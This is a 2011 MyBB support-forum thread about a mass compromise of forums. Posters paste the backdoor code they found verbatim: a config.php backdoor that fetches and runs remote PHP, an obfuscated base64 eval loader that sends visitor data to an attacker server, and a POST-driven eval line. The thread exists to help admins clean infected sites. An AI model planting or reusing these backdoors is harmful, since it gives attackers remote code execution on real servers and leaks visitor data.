MyBB Community Forums

every infected mybb forum must check
inc/config.php


after several blank lines there is a malicious script

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '06f7c042b76e4b04f698c75b7b2777ea'){
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

i dont know what does this script do ..


any way please remove it soon....




and again search for all index.php and showthread.php in server to remove malicious script

<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID​8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0​NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0Yu​IiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

i know this script sending our traffic information to hacker server .. and even possible to run more code on our server later by this script
using "eval" function (so its dangerous..!)


and again dont forget to change mysql and cpanel password


and again my suggestion to change file permission of config.php to 444 (so none can rewrite file again)

I ran "Check Templates" and the 'header_welcomeblock_member_admin' template came back with an error.

Below is what is in the mentioned template;

Quote:<a href="{$mybb->settings['bburl']}/{$config['admin_dir']}/index.php">{$lang->welcome_admin}</a>

And the default template;

Quote: &mdash; <a href="{$mybb->settings['bburl']}/{$admin_dir}/index.php">{$lang->welcome_admin}</a>

What does the difference mean?

That's nothing related to this vulnerability. Either ignore it, or replace {$config['admin_dir']} with {$admin_dir}.

Changes to the template system in MyBB 1.6.4 made using internal variables such as $config['admin_dir'] impossible.

Thoughts so. Thanks for the verification sir.

Curious but was an email sent out to the mailing list? I don't recall getting one.

(2011-10-15, 04:33 PM)labrocca Wrote: [ -> ]Curious but was an email sent out to the mailing list? I don't recall getting one.

=1, Jesse. That would have been nice. I got nailed by this and didn't figure out what it was until I visited this forum.
After the fact, I did the usual two-week update check in the AdminCP and saw the alert there.

I'm not one to complain, but I think a mass mailing would have been nice, and STILL might be a good idea. Not everyone monitors their forums like they need to in order to catch this kind of thing.

I am grateful to everyone who was part of the solution. Great work, guys. I got my boards sorted out very quickly.

In addition to the files already mentioned (/index.php, /showthread.php, /admin/config.php), I also found malignant code in /archive/index.php and /admin/index.php).

(2011-10-17, 02:20 PM)Reserector Wrote: [ -> ]

(2011-10-15, 04:33 PM)labrocca Wrote: [ -> ]Curious but was an email sent out to the mailing list? I don't recall getting one.

=1, Jesse. That would have been nice. I got nailed by this and didn't figure out what it was until I visited this forum.
After the fact, I did the usual two-week update check in the AdminCP and saw the alert there.

I'm not one to complain, but I think a mass mailing would have been nice, and STILL might be a good idea. Not everyone monitors their forums like they need to in order to catch this kind of thing.

I am grateful to everyone who was part of the solution. Great work, guys. I got my boards sorted out very quickly.

Yes and I'd like to see the MyBB Twitter used too for releases, news, and security (especially security) information.

http://twitter.com/#!/MyBBGroup

MyBB has 1300+ followers. And Twitter is super easy to use and serves an excellent purpose of disseminating information FAST. Also the retweet is nice and might help spread information as well.

I heard of the issue through Twitter.

In according to

(2011-10-15, 05:19 AM)seminar techi Wrote: [ -> ]every infected mybb forum must check...

there are some more files which ought to be checked:

/inc/languages/deutsch_du/datahandler_user.lang.php

/inc/plugins/mp3.php

/inc/languages/english/admin/tools_php_info.lang.php

These files may show two last lines, which can be invisible in a text editor. There can the following malicious code be inside:

if (isset($_POST['update'])) {eval(base64_decode($_POST['update'])); exit;}

These files do not have the php end task

?> 

It seems that these files spread around the server and infect php files from other programs too. I advise you to have a look for the words "eval" "base64_decode" which ought to be together in a line with "$_POST".

Please edit these malicious lines and change the passwords on your server.

Please have a look for peerless files when comparing the original download of a fresh MyBB copy with your forums on your server. I have found a new file which seems to be unknown to MyBB:

forums/inc/languages/english/imgs.classs.php

It's a very big file. If anyone is interested to get the code, I can post it once more.